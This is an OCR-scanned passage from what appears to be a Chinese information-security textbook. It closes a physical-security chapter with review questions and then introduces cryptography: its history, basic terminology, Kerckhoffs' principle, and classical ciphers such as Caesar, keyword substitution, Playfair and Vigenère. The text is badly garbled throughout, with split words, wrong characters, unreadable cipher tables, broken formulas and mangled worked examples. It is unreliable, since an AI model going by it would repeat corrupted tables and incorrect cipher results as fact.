的 烟尘 ,不 间断 电源 保障 等 ) 的 安全 保护 。 环 境 安全 技术 是 指 确保 物理 设备 安全 ,可 靠 运行 
的 技术 、 要 求 .措施 和 规范 的 总 和 ,主要 包括 机 房 安 全 设计 和 机 房 环境 安全 措施 。 

(3) 广义 的 设备 安全 包括 物理 设备 的 防盗 ,防止 自然 灾害 或 设备 本 身 原因 导致 的 毁坏 ， 
防止 电磁 信息 辐射 导致 的 信息 的 泄露 ,防止 线路 截获 导致 的 信息 的 毁坏 和 自 改 , 抗 电磁 干扰 
和 电源 保护 等 措施 。 狭 义 的 设备 安全 是 指 用 物理 手段 保障 计算 机 系统 或 网 络 系统 安全 的 各 
种 技术 。 常 见 的 物理 设备 安全 技术 有 访问 控制 技术 、 防 复制 技术 、 硬 件 防 辐射 技术 及 通信 线 
路 安全 技术 。 

(4) 媒体 安全 主要 包括 媒体 数据 的 安全 及 媒体 本 身 的 安全 ,数据 备份 是 实现 媒体 安全 
的 主要 技术 。 数 据 备份 是 把 文件 或 数据 库 从 原来 存储 的 地 方 复制 到 其 他 地 方 的 操作 ,其 目 
的 是 为 了 在 设备 发 生 故 障 或 发 生 其 他 威胁 数据 安全 的 灾害 时 保护 数据 ,将 数据 遭受 破坏 的 
程度 减 到 最 小 。 


. 什么 是 物理 安全 ? 包括 哪些 内 容 ? 

. 机 房 安全 设计 包括 哪些 内 容 ? 

. 简 述 计算 机 防 辆 射 泄露 的 常用 措施 。 

. 简 述 TEMPEST 标准 。 

. 数据 备份 的 种 类 有 哪些 ? 分 别 适 用 于 什么 场合 ? 
. 数据 备份 常用 的 方法 有 哪些 ? 

. 简 述 RAID 0、.RAID 1、RAID 3、RAID 5 方案 。 


入 wDL- 
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信息 保密 技术 是 利用 数学 或 物理 手段 ,对 信息 的 传输 和 存储 进行 保护 以 防止 泄露 的 技 
术 。 信 息 保密 技术 主要 包括 信息 加 密 技术 和 信息 隐藏 技 术 。 本 章 介 绍 信 息 加 密 技术 ,第 4 
章 将 介绍 信息 隐藏 技术 。 信 息 加 密 是 指使 有 用 的 信息 变 为 看 上 去 似 为 无 用 的 乱码 ,使 攻击 
者 无 法 读 懂 信 息 的 内 容 从 而 保护 信息 。 信 息 加 密 技术 是 保障 信息 安全 的 最 基本 、 最 核心 的 
技术 措施 ,是 现代 密码 学 的 主要 组 成 部 分 。 


3.1 密码 学 的 发 展 历程 


人 类 早 在 远古 时 期 就 有 了 相互 隐 螨 信息 的 想法 ,自从 有 了 文字 来 表达 人 们 的 思想 开始 ， 
人 类 就 懂得 了 如 何 用 文字 与 他 人 分 享 信息 ,以 及 用 文字 秘密 传递 信息 的 方法 ,这 就 催生 了 信 
息 保 密 科 学 的 诞生 和 发 展 。 密 码 学 的 发 展 可 以 追溯 到 4000 年 前 ,其 发 展 历史 比较 悠久 。 密 
码 学 的 发 展 大 致 经 历 了 手工 加 密 、 机 械 加 密 和 计算 机 加 密 3 个 阶段 。 

1. 手工 加 密 阶段 

早 在 公元 前 1900 年 左右 ,一 位 埃及 书 吏 就 在 碑文 中 使 用 了 非 标 准 的 象形 文字 。 据 推 
测 , 这 些 “ 秘 密 书写 "是 为 了 给 幕 主 的 生活 增加 神秘 气氛 ,从 而 提高 他 们 的 声望 。 这 可 能 是 最 
早 有 关 密 码 的 记载 了 。 

公元 前 1500 年 左右 , 美 索 不 达 米 亚 人 在 一 块 板 上 记录 了 被 加 密 的 陶器 上 釉 规 则 。 

公元 前 600 一 前 500 年 , 希 伯 来 人 设计 了 3 种 不 同 的 加 密 方法 ,它们 都 以 替换 为 基本 原 
理 , 一 个 字母 表 的 字母 与 男 一 个 字母 表 的 字母 配对 ,通过 用 相配 对 的 字母 替换 明文 的 每 个 字 
母 ,从 而 生成 密 文 。 

公元 前 500 年 左右 , 古 希 腊 斯 巴 达 出 现 了 原始 的 密 
码 器 ,其 方法 是 用 一 条 带子 缠绕 在 一 根木 棍 ( 手 杖 ) 上 ， 
沿 手杖 纵 轴 方 向 写 上 文字 , 解 下 来 的 带子 上 便 是 些 杂 
乱 无 章 的 符号 , 称 为 斯 巴 达 手杖 ,如 图 3-1 所 示 。 解 密 
者 只 需 找 到 相同 的 手杖 ,再 把 带子 绑 上 去 , 沿 手杖 纵 方 
向 即 可 读 出 原文 。 

根据 4 论 要 塞 的 防护 》( 和 希腊 人 Aeneas Tacticus 著 ) 3-1 斯 巴 达 手杖 
一 书记 载 ,公元 前 2 世纪 ,希腊 人 Polybius 设计 了 一 种 
表格 ,使 用 了 将 字母 编码 成 符号 的 方法 ,人 们 将 该 表 称 为 Polybius 校 验 表 , 如 表 3-1 所 示 。 
将 每 个 字母 表示 成 两 位 数 , 其 中 第 一 个 数字 表示 字母 所 在 的 行 数 ,第 二 个 数字 表示 字母 所 在 
的 列 数 ,如 字母 A 对 应 “11”, 字 母 B 对 应 *12”, 字 母 C 对 应 13 等。 明文“enemy” 被 表示 成 
一 串 数字 , 即 1533153254。 
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表 3-1 Polybius 校 验 表 


行 
列 

1 2 3 4 s 
1 A B C D E 
2 1 全 H UJ K 
3 L M N P 
4 Q R S 于 0 
5 V Ww X 时 Zz 


公元 前 100 年 左右 ,著名 的 恺 撤 (Caesar) 密 码 被 应 用 于 战争 中 , 它 是 最 简单 的 一 种 加 密 
办 法 , 即 用 单字 母 来 代替 明文 中 的 字母 。 

公元 800 年 左右 ,阿拉 伯 密 码 学 家 阿尔 。 金 迪 提 出 解密 的 频率 分 析 方 法 , 即 通 过 分 析 计 
算 密 文中 字母 出 现 的 频率 来 破译 密码 。 

公元 16 世纪 中 期 ,意大利 数学 家 卡尔 达 诺 (Cardano) 发 明了 卡尔 达 诺 漏 板 ,将 其 覆盖 在 
密 文 上 ,可 从 漏 板 中 读 出 明文 ,这 是 较 早 的 一 种 分 置式 密码 。 

我 国 很 早 就 出 现 了 藏 头 诗 、. 藏 尾 诗 、 漏 格 诗 及 绘画 等 ,人 们 将 要 表达 的 真正 意思 隐藏 在 
诗 文 或 画卷 中 ,一 般 人 只 注意 诗 或 画 自 身 表达 的 意境 ,而 不 会 去 注意 或 很 难 发 现 隐藏 在 其 中 
的 “ 诗 外 之 音 ”。 

古典 密码 的 加 密 方法 一 般 是 采用 文字 置换 , 主要 使 用 手工 方式 实现 ,因此 称 这 一 时 期 为 
密码 学 发 展 的 手工 加 密 阶段 。 

2. 机 械 加 密 阶 段 

20 世纪 20 年 代 , 随 着 机 械 和 机 电 技术 的 成 熟 , 以 及 电报 和 无 线 电 技术 的 出 现 , 引 起 了 
密码 设备 的 一 场 革命 一 一 转 轮 密码 机 的 发 明 。 转 轮 密码 机 的 出 现 是 密码 学 的 重要 标志 之 
一 。 通 过 硬件 卷 绕 可 实现 从 转 轮 密码 机 的 一 边 到 另 一 边 的 单字 母 代替 ,将 多 个 这 样 的 转 轮 
密码 机 连接 起 来 , 便 可 实现 几乎 任何 复杂 度 的 多 个 字母 代替 。 随 着 转 轮 密码 机 的 出 现 ,传统 
密码 学 有 了 很 大 的 进展 ,利用 机 械 转 轮 密 码 机 可 以 开发 出 极其 复杂 的 加 密 系 统 。 

1921 年 以 后 的 几 十 年 里 ,Hebern 构造 了 一 系列 稳步 改进 的 转 轮 密码 机 ,并 将 其 投入 到 
美国 海军 的 试用 评估 中 ,并 申请 了 美国 转 轮 密码 机 的 专利 。 这 种 装置 在 随后 的 近 50 年 中 被 
指定 为 美军 的 主要 密码 设备 。 

在 Hebern 发 明 转 轮 密码 机 的 同时 ,欧洲 的 工程 师 ( 如 荷兰 的 Hugo Koch、 德 国 的 
Arthur Scherbius) 独 立地 提出 了 转 轮 密码 机 的 概念 。Arthur Scherbius 于 1919 年 设计 了 
历史 上 著名 的 转 轮 密码 机 一 一 德国 的 Enigma 机 。 在 第 二 次 世界 大 战 期 间 ,Enigma 机 曾 作 
为 德国 海 、 陆 、 空 三 军 中 最 高 级 的 密码 机 。 英 国 军队 从 1942 年 2 一 12 月 都 没 能 解 出 德国 潜 
艇 发 出 的 信号 。 因 此 ,随后 英国 发 明 并 使 用 了 德国 Enigma 机 的 改进 型 密码 机 , 它 在 英国 军 
队 通 信 中 被 广泛 使 用 ,并 帮助 他 们 破译 了 德国 军队 的 信号 。 转 轮 密 码 机 的 使 用 大 大 提高 了 
密码 加 密 速度 ,但 由 于 密 钥 量 有 限 , 在 第 二 次 世界 大 战 中 后 期 , 它 引 出 了 一 场 关 于 加 密 与 破 
译 的 对 抗 。 第 二 次 世界 大 战 期 间 ,波兰 人 和 英国 人 破译 了 Enigma 密码 ,美国 密码 分 析 者 破 
译 了 日 本 的 RED、ORANGE 和 PURPLE 密码 ,这 对 盟 军 获胜 起 到 了 关键 的 作用 ,是 密码 分 
析 史 上 最 伟大 的 成 功 。 
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3. 计算 机 加 密 阶 段 

计算 机 科学 的 发 展 刺激 和 推动 了 密码 学 进入 计算 机 加 密 阶 段 。 一 方面 ,电子 计算 机 成 
为 破译 密码 的 有 力 武 器 ; 另 一 方面 ,计算 机 和 电子 学 给 密码 的 设计 带 来 了 前 所 未 有 的 自由 ， 
利用 计算 机 可 以 轻易 地 摆脱 原先 用 铅笔 和 纸 进 行 手工 设计 时 易 犯 的 错误 ,也 不 用 面 对 机 械 
式 转 轮机 实现 方式 的 高 额 费用 。 利 用 计算 机 还 可 以 设计 出 更 为 复杂 的 密码 系统 。 

在 1949 年 以 前 出 现 的 密码 技术 还 算 不 上 真正 的 科学 , 那 时 的 密码 专家 常常 是 凭借 直觉 
进行 密码 设计 和 分 析 的 。1949 年 ,Shannon 发 表 了 《保密 系统 的 通信 理论 ), 为 密码 学 的 发 
展 葛 定 了 理论 基础 ,使 密码 学 成 为 一 门 真正 的 科学 。1949 一 1975 年 ,密码 学 主要 研究 单 钥 
密码 体制 , 且 发 展 比 较 缓慢 。1976 年 ,Diffie 和 Hellman 发 表 了 《密码 学 的 新 方向 ) 一 文 , 提 
出 了 一 种 新 的 密码 设计 思想 ,从 而 开创 了 公 钥 密码 学 的 新 纪元 。1977 年 ,美国 国家 技术 标 
准 局 (NIST) 正 式 公布 了 数据 加 密 标 准 (Data Encryption Standard,DES) ,将 DES 算法 公 
开 , 揭 开 了 密码 学 的 神秘 面纱 ,大 大 推动 了 密码 学 理论 的 发 展 和 技术 应 用 。 

十 多 年 来 ,由 于 现实 生活 的 实际 需要 及 计算 技术 的 发 展 ,密码 学 的 每 一 个 研究 领域 都 出 
现 了 许多 新 的 课题 。 例 如 ,在 分 组 密码 领域 ,以 往 人 们 认为 安全 的 DES 算 法 ,在 新 的 分 析 法 
及 计算 技术 面前 已 被 证 明 不 再 安全 了 。 于 是 ,美国 于 1997 年 1 月 开始 征集 新 一 代数 据 加 密 
标准 , 即 高 级 数据 加 密 标准 (Advanced Encryption Standard,AES)。 目前 ,AES 征集 活动 已 
经 选择 了 比利时 密码 学 家 设计 的 Rijndael 算法 作为 新 一 代数 据 加 密 标准 , 且 该 征集 活动 在 
密码 界 又 掀起 了 一 次 分 组 密码 研究 的 高 潮 。 同 时 ,在 公 钥 密码 领域 ,椭圆 曲线 密码 体制 由 于 
具有 安全 性 高 .计算 速度 快 等 优点 而 引起 了 人 们 的 普遍 关注 ,一 些 新 的 公 钥 密码 体制 (如 基 
于 格 的 公 钥 体制 NTRU、 基 于 身份 的 和 无 证 书 的 公 钥 密码 体制 ) 相 继 被 提出 。 在 数字 签名 
方面 ,各 种 有 不 同 实际 应 用 背景 的 签名 方案 (如 讶 签名 、 群 签名 、 环 签名 指定 验证 人 签名 、 聚 
合 签名 等 ) 不 断 出 现 。 在 应 用 方面 ,各 种 有 实用 价值 的 密码 体制 的 快速 实现 受到 了 专家 的 高 
度 重视 ,许多 密码 标准 ,应 用 软件 和 产品 被 开发 和 应 用 。 一 些 国家 (如 美国 .中 国 等) 已 经 颁 
布 了 数字 签名 法 ,使 数字 签名 在 电子 商务 和 电子 政务 等 领域 得 到 了 法 律 的 认可 。 随 着 其 他 
技术 的 发 展 ,一 些 具有 潜在 密码 应 用 价值 的 技术 也 得 到 了 密码 学 家 的 重视 ,出 现 了 一 些 新 的 
密码 技术 ,如 混沌 密码 ,量子 密码 .DNA 密码 等 。 现 在 ,密码 学 的 研究 和 应 用 已 大 规模 地 扩 
展 到 了 民用 方面 。 


3.2 ”密码 学 中 的 基本 术语 


密码 学 的 英文 为 Cryptography, 该 词 来 源 于 古 希 腊 语 的 Kryptos 和 Graphein ,希腊 语 
的 原意 是 密 写 术 , 即 将 易 懂 的 信息 (如 文字 ) 通 过 一 些 变 换 转换 为 难以 理解 的 信息 (如 令 人 费 
解 的 符号 ) 。 密 码 学 研究 进行 保密 通信 和 如 何 实现 信息 保密 的 问题 ,具体 指 通信 保密 传输 和 
信息 存储 加 密 等 。 它 以 认识 密码 变换 的 本 质 、 研 究 密码 保密 与 破译 的 基本 规律 为 对 象 ,主要 
以 可 靠 的 数学 方法 和 理论 为 基础 ,对 解决 信息 安全 中 的 机 密 性 数据 完整 性 .认证 和 身份 识 
别 , 对 信息 的 可 控 性 及 不 可 抵赖 性 等 问题 提供 系统 的 理论 .方法 和 技术 。 密 码 学 包括 两 个 分 
支 : 密码 编码 学 和 密码 分 析 学 。 密 码 编码 学 研究 对 信息 进行 编码 ,实现 对 信息 的 隐藏 ; 密 
码 分 析 学 研究 加 密 消 息 的 破译 或 消息 的 伪造 。 下 面 是 密码 学 中 一 些 常用 的 术语 。 
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(1) 明文 (plaintext/message) : 指 待 加 密 的 信息 ,用 P 或 M 表示 。 明 文 可 以 是 文本 文 
件 、 图 形 .数字 化 存储 的 语音 流 或 数字 化 视频 图 像 的 比特 流 等 。 

(2) 密 文 (cipertext) : 指明 文 经 过 加 密 处 理 后 的 形式 ,用 C 表示 。 

(3) 加 密 (encryption) : 指 用 某 种 方法 伪装 消息 以 隐藏 它 的 内 容 的 过 程 。 

(4) 加 密 算 法 (encryption algorithm): 指 将 明文 变换 为 密 文 的 变换 函数 ,通常 用 EF 
表示 。 

(5) 解密 (decryption) ; 指 把 密 文 转换 为 明文 的 过 程 。 

(6) 解密 算法 (decryption algorithm): 指 将 密 文 变换 为 明文 的 变换 函数 ,通常 用 DD 
表示 。 

(7) 密 钥 (key) : 变换 函数 所 用 的 一 个 控制 参数 。 加 密 和 解密 算法 的 操作 通常 是 在 一 
组 密 钥 控制 下 进行 的 ,分 别称 为 加 密 密 钥 和 解密 密 钥 ,通常 用 天 表示 。 

(8) 密码 分 析 (cryptanalysis) : 指 截获 密 文 者 试图 通过 分 析 截 获 的 密 文 从 而 推断 出 原 
来 的 明文 或 密 钥 的 过 程 。 

(9) 被 动 攻击 (passive attack) : 指 对 一 个 保密 系统 采取 截获 密 文 并 对 其 进行 分 析 和 攻 
击 。 这 种 攻击 对 密 文 没有 破坏 作用 。 

(10) 主动 攻击 (active attack) : 指 攻击 者 非法 侵入 一 个 密码 系统 ,采用 伪造 ,修改 、 删 除 
等 手段 向 系统 注入 假 消息 进行 欺骗 。 这 种 攻击 对 密 文具 有 破坏 作用 。 

(11) 密码 系统 (cryptosystem) : 指 用 于 加 密 和 解密 的 系统 。 加 密 时 ,系统 输入 明文 和 
加 密 密 钥 ,加 密 变换 后 ,输出 密 文 ; 解密 时 ,系统 输入 密 文 和 解密 密 钥 ,解密 变换 后 ,输出 明 
文 。 在 基于 密码 的 保密 系统 中 ,为 了 便于 研究 其 一 般 规律 ,通常 将 密码 系统 抽象 为 一 般 模 


型 ,如 图 3-2 所 示 。 


信 源 |- 人 | 加 密 变换 C=EKP) -| 解密 变换 P=Dx(C) | | 信 宿 


| | 


密 钥 密 钥 


图 3-2 密码 系统 模型 


(12) 密码 体制 : 密码 系统 采用 的 基本 工作 方式 称 为 密码 体制 。 密 码 体制 的 要 素 是 密码 
算法 和 密 钥 。 根 据 密 钥 的 使 用 方式 和 密码 算法 的 加 密 方式 可 以 对 密码 系统 进行 不 同 的 分 类 。 

柯 克 霍 夫 (Kerckhoffs) 原 则 : 密码 系统 的 安全 性 取决 于 密 钥 ,而 不 是 密码 算法 , 即 密码 
算法 要 公开 。 柯 克 霍 夫 原 则 是 荷兰 密码 学 家 Kerckhoffs 于 1883 年 在 名 著 《 军 事 密码 学 ) 中 
提出 的 基本 假设 。 遵 循 这 个 假设 的 好 处 是 , 它 是 评估 算法 安全 性 唯一 可 用 的 方式 。 因 为 如 
果 密 码 算 法 保密 ,密码 算法 的 安全 强度 就 无 法 进行 评估 ; 防止 算法 设计 者 在 算法 中 隐藏 后 
门 。 因 为 算法 被 公开 后 ,密码 学 家 可 以 研究 .分 析 其 是 否 存在 漏洞 ,同时 也 接受 攻击 者 的 检 
验 , 有 助 于 推广 使 用 。 当 前 网 络 应 用 十 分 普及 ,密码 算法 的 应 用 不 再 局 限于 传统 的 军事 领 
域 ,只 有 公开 使 用 ,密码 算法 才 可 能 被 大 多 数 人 接受 并 使 用 。 同 时 ,对 用 户 而 言 , 只 需 掌 握 密 
钥 就 可 以 使 用 了 ,非常 方便 。 
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3.3 上 古典 密码 体制 


古典 密码 时 期 一 般 认为 是 从 古代 到 19 世纪 末 , 这 个 时 期 生产 力 水 平 低 ,加 密 、 解 密 方法 
主要 以 纸 \ 笔 或 简单 的 器 械 来 实现 ,在 这 个 时 期 提出 和 使 用 的 密码 称 为 古典 密码 。 古 典 密码 
是 密码 学 发 展 的 初级 阶段 。 尽 管 古 典 密码 大 都 较 简单 ,但 由 于 其 安全 性 差 , 目 前 应 用 很 少 。 
研究 古典 密码 的 原理 ,有 助 于 理解 .构造 和 分 析 近 代 密 码 。 蔡 代 (substitution) 和 置换 
(permutation) 是 古典 密码 中 用 到 的 两 种 基本 处 理 技巧 ,它们 在 现代 密码 学 中 也 得 到 了 广泛 
使 用 。 


3.3.1 替代 密码 


替代 密码 Csubstitution cipher) 是 明文 中 的 每 一 个 字符 被 蔡 换 成 密 文中 的 另 一 个 字符 。 
接收 者 对 密 文 做 反 向 替换 就 可 以 恢复 出 明文 。 古 典 密码 学 中 采用 替代 运算 的 典型 密码 算法 
有 单 表 密 码 .多 表 密 码 等 。 

1. 单 表 密码 

单 表 密 码 全 称 为 单 表 替代 密码 。 单 表 替 代 密 码 是 对 明文 中 的 所 有 字母 都 使 用 同一 个 映 
射 , 即 

VpEP, 有 Exr: P—>C, Ex(p)=¢ 

为 了 保证 加 密 的 可 逆 性 ,一般 要 求 映 射 已 是 一 一 映射 。 单 表 替 代 密 码 最 典型 的 例子 就 
是 著名 的 恺 撤 密码 ,一 般 意义 上 的 单 表 替代 也 称 移 位 密码 ,乘法 密码 、 仿 射 密码 ,使 用 密 钥 词 
(组 ) 的 单 表 替代 和 随机 替代 等 。 下 面 通过 恺 撤 密 码 和 使 用 密 钥 词 (组 ) 的 单 表 替代 为 例 进行 
介绍 。 

(1) 恺 撤 密码 。 恺 撤 密码 是 把 字母 表 中 的 每 个 字母 用 该 字母 后 面 第 3 个 字母 进行 替 
代 , 如 表 3-2 所 示 。 为 便于 区 分 ,下 面 用 小 写字 母 表示 明文 ,大 写字 母 表示 密 文 。 

表 3-2 恺 撤 密 码 


明文 |albleldlelflglhliljlkliilmlnlolplqalrlislitliulviwixly|s 


密 变 |DIEIFIGINHITIITIRILIMNIOPIQIRI SITIYIYVIWIE|| | | 


【 例 3-1】 明文 : this is a book。 

密 文 : WKLV LV D ERRN。 

明文 和 密 文 空间 是 26 个 字母 的 循环 ,所 以 z 后面 的 字母 是 a。 如 果 为 每 个 字母 分 配 一 
个 数值 (a 二 0,b 二 1,…,z 二 25) , 则 该 算法 能 够 表示 为 : 

C= Er(p) = (p+3) (mod 26) 

其 中 C 代表 密 文 ,p 代表 明文 。 

(2) 使 用 密 钥 词 (组 ) 的 单 表 替 代 。 这 种 密码 选用 一 个 英文 短语 或 单词 串 作为 密 钥 ,去 
掉 其 中 重复 的 字母 得 到 一 个 无 重复 字母 的 字母 串 , 然 后 再 将 字母 表 中 的 其 他 字母 依次 写 于 
此 字母 串 之 后 ,就 构造 出 一 个 字母 蔡 代 表 。 这 种 单 表 蔡 代 泄 露 给 破译 者 的 信息 更 少 ,而 且 密 
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钥 可 以 随时 更 改 , 增 加 了 灵活 性 。 
【 例 3-2】 设 密 钥 为 time。 密 码 表 如 表 3-3 所 示 。 


表 3-3 密 钥 为 time 的 密码 表 


鸯 训 | 加 | 著 | 入 | 允 ,| 总 | 起 | 六 | 莉 | 寺 | 千 | 入 | 芋 | 六 | 诞 | 窟 | 疙 | 惫 | 生 | 洛 生 | 六 | 党 | 前 | 汪 | 过 | 剖 


密 文 |TIIIMIEIAIB|ICIDIFIGIHIJIKILINIOlPIQIRISIUIVviwixlY|lz 
因此 ,如 果 明 文 为 *code”, 则 对 应 的 密 文 为 “MNEA”。 
【 例 3-3】〗 设 密 钥 为 timeisup。 密 码 表 如 表 3-4 所 示 。 
表 3-4 密 钥 为 timeisup 的 密码 表 


油 交 | 三 | 于 | 意志 外 下 1 生 | 本 | 枚 | 亚 | 于 | 本 | 上 | 入 | 可 | 委 | 壹 | 坟 | 重 这 | 补 | 弟 | 专 | 要 | 全] 次 


密 安 |T|ILIMIEITISIUIPIAILBICIDIPFGHITIKILINIO QIV|NIT| | 


因此 ,如 果 明 文 为 *code”, 则 对 应 的 密 文 为 “MHEI”。 
单 表 蔡 代 密 码 的 密 钥 量 很 小 ,不 能 抵抗 穷尽 搜索 攻击 ,而 且 很 容易 受到 统计 分 析 的 攻 
击 。 因 为 如 果 密 码 分 析 者 知道 明文 的 某 些 性 质 ( 如 非 压 缩 的 英文 ), 则 分 析 者 就 能 够 利用 该 
语言 的 规律 性 进行 分 析 , 从 这 一 点 意义 上 讲 , 汉 语 在 加 密 方面 的 特性 要 优 于 英语 ,因为 汉语 
常用 字 有 3000 多 个 ,而 英语 只 有 26 个 字母 。 

2. 多 表 密 码 

单 表 蔡 代 密 码 的 明文 中 单字 母 出 现 频 率 分 布 与 密 文 中 的 相同 ,为 了 克服 这 个 缺点 ,多 表 
替代 密码 使 用 从 明文 字母 到 密 文字 母 的 多 个 映射 来 隐藏 单字 母 出 现 的 频率 分 布 , 其 中 每 个 
映射 是 简单 替代 密码 中 的 一 对 一 映射 ( 即 处理 明 文 消 息 时 使 用 不 同 的 单字 母 替代 ) 。 多 表 替 
代 密 码 将 明文 字符 划分 为 长 度 相同 的 消息 单元 , 称 为 明文 组 ,对 不 同 明文 组 进行 不 同 的 蔡 
代 , 即 使 用 了 多 张 单 字母 蔡 代 表 , 从 而 使 同一 个 字符 对 应 不 同 的 密 文 ,改变 了 单 表 代替 中 密 
文 与 明文 字母 的 唯一 对 应 性 ,使 密码 分 析 更 加 困难 。 多 字母 代替 的 优点 是 很 容易 将 字母 的 
自然 频 度 隐蔽 或 均匀 化 ,从 而 可 以 抗击 统计 概率 分 析 。Playfair 密码 .Vigenere 密码 、Hill 
密码 都 是 这 一 类 型 的 密码 。 

(1) Playfair 密码 。Playfair 密码 出 现 于 1854 年 , 它 将 明文 中 的 双 字 母 组 合作 为 一 个 单 
元 对 待 ,并 将 这 些 单元 转换 为 密 文 双 字母 组 合 。Playfair 密码 基于 一 个 5X5 字母 矩阵 ,该 
矩阵 使 用 一 个 关键 词 ( 密 钥 ) 来 构造 ,其 构造 方法 是 : 从 左 至 右 `. 从 上 至 下 依次 填 人 关键 词 的 
字母 (去 除 重复 的 字母 ) ,然后 再 以 字母 表 顺 序 依次 填 人 其 他 字母 。 字 母 I 和 本 被 算 为 一 个 
字母 ( 即 丁 被 当 作 I 处 理 ) 。 

对 每 一 对 明文 字母 p1 、p 的 加 密 方法 如 下 。 

@ 若 pi、p: 在 同一 行 , 则 对 应 的 密 文 C, 和 C 分 别 是 紧 靠 pi 、ps 右 端 的 字母 。 其 中 第 
一 列 被 看 作 是 最 后 一 列 的 右 方 (解密 时 反 向 ) 。 

@ 车 pi、p: 在 同一 列 , 则 对 应 的 密 文 C; 和 C; 分 别 是 紧 靠 pi 、p: 下 方 的 字母 。 其 中 第 
一 行 被 看 作 是 最 后 一 行 的 下 方 (解密 时 反 向 )。 

G@) 若 pi、p: 不 在 同一 行 ,也 不 在 同一 列 , 则 C 和 C。 是 由 p; 和 ps 确定 的 矩形 的 其 他 
两 角 的 字母 ,并且 C 和 pi 、Cs 和 ps 同行 (解密 时 处 理 方法 相同 ) 。 
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@ 车 pi 二 ps, 则 在 重复 字母 之 间 插 入 一 个 字母 (如 Q, 需 要 事先 约定 ) ,并 用 前 述 方法 
处 理 。 

加 若 明文 字母 数 为 奇数 , 则 在 明文 的 末端 添加 某 个 事先 约定 的 字母 作为 填充 。 

【 例 3-4】 密 钥 是 monarchy。 

解 : 构造 的 字母 矩阵 如 表 3-5 所 示 。 


表 3-5 字母 矩阵 表 


M 0 N A R 
C H YY B D 
E F G /J K 
I F Q S 和 
UU V Ww X Z 


如 果 明 文 是 P 二 armuhsea, 先 将 明文 分 成 两 个 字母 一 组 : 

ar mu hs ea 
根据 表 3-5 中 的 对 应 密 文 为 : 
RM CM BP IM(UM) 

Playfair 密码 与 简单 的 单一 字母 替代 密码 相 比 有 了 很 大 的 进步 。 首 先 ,虽然 仅 有 26 个 
字母 ,但 有 676(26X26) 种 双 字 母 组 合 , 因 此 识别 各 种 双 字母 组 合 要 比 简单 的 单一 字母 蔡 代 
密码 困难 得 多 ; 其 次 ,各 个 字母 组 的 频率 要 比 单字 母 范围 大 ,这 使 得 频率 分 析 更 加 困难 。 尽 
管 如 此 ,Playfair 密码 还 是 相对 容易 被 攻破 的 ,因为 它 仍然 使 许多 明文 语言 的 结构 保存 完 
好 。 几 百 字 的 密 文通 常 就 足以 用 统计 分 析 破 译 了 。 

区 别 Playfair 密码 和 单 表 密 码 的 有 效 方法 是 : 计算 在 文本 中 每 个 字母 出 现 的 频率 ,并 
与 字母 e( 最 为 常用 的 字母 ) 出 现 的 频率 相 除 , 设 e 的 相对 频率 为 1, 则 其 他 字母 的 相对 频率 
可 以 得 出 ,如 t 的 相对 频率 为 0. 67, 然 后 画 一 个 图 线 ,水 平 轴 上 的 点 对 应 于 以 递减 频率 顺序 
排列 的 字母 。 为 了 归 一 化 该 图 线 ,在 密 文 中 出 现 的 每 个 字母 的 数量 再 次 被 e 在 明文 中 出 现 
的 次 数 相 除 。 因 此 结果 图 线 显 示 了 由 加 密 屏蔽 的 字母 的 频率 分 布 程度 ,这 使 得 分 解 替代 密 
码 十 分 容易 。 如 果 该 频率 分 布 信息 全 部 隐藏 在 该 加 密 过 程 中 ,频率 的 明文 图 线 将 是 平坦 的 ， 
使 用 单字 母 统计 分 析 方法 将 很 难 破译 该 密码 。 

(2) Vigenere 密码 。Vigenere 密码 是 16 世纪 法 国 著名 密码 学 家 Blaise de Vigenere 于 
1568 年 发 明 的 , 它 是 最 著名 的 多 表 替 代 密 码 的 例子 。Vigenere 密码 使 用 一 个 词组 作为 密 
钥 , 密 钥 中 每 一 个 字母 用 来 确定 一 个 蔡 代表, 每 一 个 密 钥 字母 被 用 来 加 密 一 个 明文 字母 ,第 
一 个 密 钥 字母 加 密 明 文 的 第 一 个 字母 ,第 二 个 密 钥 字母 加 密 明 文 的 第 二 个 字母 ,等 所 有 密 钥 
字母 使 用 完 后 , 密 钥 又 再 循环 使 用 。 

为 了 帮助 理解 该 算法 ,需要 构建 一 个 表 , 如 图 3-3 所 示 ,26 个 密 文 都 是 水 平 排列 的 ,最 
左边 一 列 为 密 钥 字母 ,最 上 面 一 行为 明文 字母 。 其 加 解密 过 程 如 下 。 

加 密 过 程 : 给 定 一 个 密 钥 字母 & 和 一 个 明文 字母 p , 密 文字 母 就 是 位 于 所 在 行 与 p 
所 在 列 交叉 点 上 的 那个 字母 。 

解密 过 程 : 由 密 钥 字母 决定 行 , 在 该 行 中 找到 密 文字 母 , 密 文字 母 所 在 列 的 列 首 对 应 的 
明文 字母 就 是 相应 的 明文 。 
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图 3-3 Vigenere 表 


nj AN|<|oaloDlelolelolz| -|=| 兰 > 三 zelaleclelwolcF|2|>|= 关 | 关 |> 
a>|INI<Ialolalnle|lo|I|-I-|¥|2|2|zlolalolz|lwlc|>|>|z|x 
<| 关 |>|N| < oj 口中 jj 工 | -|=| 兰 |>| 研 zel=jel<lolFl>2|>|z= 
zs|Z|x|>|INI<IalolololclolI|-|-|x|2|2|z|lols|lolx|lnlc|2|> 
>|>|2|lx|l>|INI<iamlololo|lclolI|-|I-|¥|2|2|ziolciolx|lnwlc|o 
=s|>|>|2|x|>|INI<|lamlololnle|lo|lII-I-|¥|2|2|z|lolelolxinlc 
~|c|l2|>|z|x|I>|INI<lalolololclolI|-|-|¥|2|2|zlolalolz|lvn 
-wlc|l2I>|z|lx|I>|INI<lamlololom|lc|lolII-|I-|¥|2|2|zlolc|lolz 
[elolcl3SI>l2|x<|>IN[<|elolalslelo[=[-|=|z[-|2|z|lole|S 
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IololciolrIl-i-|Ix|i2|23IziolclolxlwlcIol>|2|Ix|i>|INI<iolo 
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sisiolsislI~|vlsI~|~ lI~|Is|Islolalsls|-|~|Is|>|=|#|a|n 


假设 数字 0 一 25 分 别 表示 26 个 英文 字母 a 一 z, 则 Vigenere 密码 亦 可 用 下 列 公式 表示 : 


加 密 算法 : 


pi + ki(mod 26) 


每 


解密 算法 : 


pi = ci — ki(mod 26) 


其 中 ,pi\ci、k; 分 别 表示 第 ; 个 明文 、 密 文 和 密 钥 字母 编码 , 密 钥 字母 编码 有 荆 个 。 


college, 当 明 文 m 二 a man liberal in his 


views 时 ,使 用 Vigenere 密码 技术 后 得 到 的 密 文 是 什么 ? 


【 例 3-5】 假设 英文 字母 表 (n 二 26), 密 钥 


解 : 


(OM =a*05k =0-*2 


ci 一 0 十 2(mod 26) 一 2 一 c 


@ 力 : 一 7 一 12,R2 一 0 一 ]4 


